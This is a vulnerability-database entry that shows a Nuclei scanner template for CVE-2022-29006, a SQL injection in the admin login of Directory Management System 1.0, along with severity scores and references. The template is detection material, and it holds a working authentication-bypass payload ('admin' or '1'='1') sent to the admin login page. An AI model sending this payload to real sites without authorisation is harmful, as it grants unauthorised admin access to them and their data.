Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29006
HistorySep 01, 2022 - 12:34 p.m.

Directory Management System 1.0 - SQL Injection

2022-09-0112:34:27
ProjectDiscovery
github.com
5
cve2022
sqli
auth-bypass
edb
phpgurukul

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.147

Percentile

95.9%

Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-29006

info:
  name: Directory Management System 1.0 - SQL Injection
  author: TenBird
  severity: critical
  description: |
    Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0.
  reference:
    - https://www.exploit-db.com/exploits/50370
    - https://phpgurukul.com/directory-management-system-using-php-and-mysql/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29006
    - https://github.com/sudoninja-noob/CVE-2022-29006/blob/main/CVE-2022-29006.txt
    - https://github.com/sudoninja-noob/CVE-2022-29006
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29006
    cwe-id: CWE-89
    epss-score: 0.1338
    epss-percentile: 0.95581
    cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: directory_management_system
  tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin' or '1'='1&password=1&login=login
      - |
        GET /admin/dashboard.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'DMS || Dashboard'
          - 'DMS Admin'
          - 'Admin Profile'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b77fdc0e3ddf8c8bc57ec5a424048ad33578c5a442f8570831738bd54171d38002207fe758e52bbb68d686119cde5763c863fed543019e5fcb412fb951e7b82ba8fc:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.147

Percentile

95.9%

Related for NUCLEI:CVE-2022-29006